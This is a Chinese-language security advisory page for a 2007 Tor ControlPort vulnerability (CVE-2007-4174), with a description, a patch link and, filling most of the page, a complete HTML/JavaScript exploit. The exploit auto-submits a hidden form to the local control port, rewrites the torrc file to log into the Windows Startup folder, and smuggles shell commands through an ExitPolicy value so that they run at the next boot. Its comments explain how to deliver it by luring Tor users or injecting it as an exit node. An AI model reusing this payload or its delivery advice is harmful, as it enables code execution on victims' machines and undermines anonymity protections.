发布日期：2007-08-02
更新日期：2007-08-07

受影响系统：

Tor Tor 0.1.2.15

不受影响系统：

Tor Tor 0.1.2.16

描述：

---

BUGTRAQ  ID: 25188
CVE(CAN) ID: CVE-2007-4174

Tor是一个工具集，帮助各类组织和个人增强互联网上活动的安全。

Tor在处理特定的连接功能时存在漏洞，远程攻击者可能利用此漏洞非授权获取访问。

如果启用了Tor中的ControlPort功能的话，则在处理到ControlPort的多个连接时远程攻击者可以在某些情况下非授权重写用户的torrc配置文件，这可能弱化软件所提供的匿名服务。

<*来源：Tor
  
  链接：http://secunia.com/advisories/26301/
        http://archives.seul.org/or/announce/Aug-2007/msg00000.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!--

Tor < 0.1.2.16 with ControlPort enabled ( not default )
Exploit for Tor ControlPort "torrc" Rewrite Vulnerability http://secunia.com/advisories/26301

Rewrites the torrc to log to a different location: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\t.bat
Also enables debug logging, and an erroneous ExitPolicy looking something like this: reject*:1337\'&' calc.exe  this will output:
[debug] parse_addr_policy(): Adding new entry 'reject*:1337'& calc.exe to the debug log -> t.bat which will run calc.exe on next boot.

This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way.

Either have a TOR user visit this HTML or inject it into her traffic when you're a TOR exit.
If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD> ( that's why I tried to fit everything inside <HEAD />), and fix Content-Length

// elgCrew _AT_ safe-mail.net
-->

<html>
<head>
<script language="javascript">

window.onload = function()
{

    cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit';
    inject = '\r\nAUTHENTICATE\r\nSETCONF Log=\"debug-debug file C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\t.bat\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\nSETCONF ExitPolicy=\"reject*:1337\\\'&' + cmd + '&\"\r\nSETCONF Log=\"info file c:\\\\tor.txt\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\n';
    
    form51.area51.value = inject;
    document.form51.submit();
}
</script>

<form target="hiddenframe" name="form51" action="http://localhost.mil.se:9051" method=POST enctype="multipart/form-data">
<input type=hidden name=area51>
</form>
<iframe width=0 height=0 frameborder=0 name="hiddenframe"></iframe>
</head>

<body>
<pre>
  ----
| y0! |
  ----
          \  \_\_    _/_/
           \     (oo)\_______
                 |_|\        )*
                     ||----w |
                     ||     ||
</pre>
</body>
</html>

建议：

---

厂商补丁：

Tor
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://tor.eff.org/download.html.en

浏览次数：3304
严重程度：0（网友投票）